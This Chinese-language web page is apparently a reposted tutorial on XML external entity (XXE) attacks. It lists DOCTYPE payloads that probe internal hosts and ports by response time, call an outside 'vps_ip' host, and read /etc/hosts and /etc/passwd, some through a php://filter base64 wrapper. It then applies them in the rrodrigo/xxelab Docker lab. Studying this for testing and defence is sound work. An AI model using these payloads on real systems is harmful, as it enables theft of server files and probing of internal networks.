溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
引用外部DTD文件訪問內網主機/端口。
<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> (看響應時間)
引用外部DTD文件訪問wai網。
<!DOCTYPE a SYSTEM "http://vps_ip" >
引用內部實體。
<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>
外部實體讀本地文件。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>
外部實體訪問內wang主機端口。
<!DOCTYPE a SYSTEM "http://192.168.1.2:80">(看響應時間)
外部實體訪問wai網。
<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>
docker中下載rrodrigo/xxelab該鏡像
啟動:docker run -d -p 8082:80 rrodrigo/xxelab
抓取注冊包,發現采用xml格式傳遞,且郵箱有返回:
將返回內容處進行xxe回顯設置讀取/etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "/etc/passwd">
]>
利用base64編碼進行xxe,防止有返回包驗證
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE c [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
]>
返回base64數據包,base64解碼
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
